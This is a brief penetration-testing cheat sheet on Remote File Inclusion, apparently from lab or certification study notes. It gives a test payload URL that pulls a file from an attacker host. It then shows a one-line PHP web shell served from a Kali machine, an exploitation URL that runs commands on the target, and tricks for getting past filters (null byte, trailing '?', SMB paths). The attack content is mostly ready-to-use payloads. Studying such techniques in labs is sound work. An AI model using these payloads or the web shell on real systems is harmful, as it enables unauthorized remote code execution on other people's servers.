# RFI - Remote File Inclusion

See PG Practice SLORT for uploading a php reverse shell that executes simultaneously in windows!

<https://securityxploded.com/remote-file-inclusion.php>

&#x20;

Less common than LFI because it has to be configured to be able to call remotely, however ALWAYS CHECK IT if you found a LFI.

**Test payload:**

[`http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt`](http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt)

&#x20;

Result would be an incoming connection on a nc listener.

&#x20;

**Exploiting:**

**Host the file with malicious php code:**

```
kali@kali:/var/www/html$ cat evil.txt
<?php echo shell_exec($_GET['cmd']); ?>
kali@kali:/var/www/html$ sudo systemctl restart apache2
```

&#x20;

**Call it with the RFI payload:**

```
http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig
```

&#x20;

&#x20;

**Tricks:**

* Add null byte to terminate string and bypass upload restriction of filetype - %00
* Append a ? to the end of the payload to continue the string as if there isn't a payload
* If http is excluded, try SMB link instead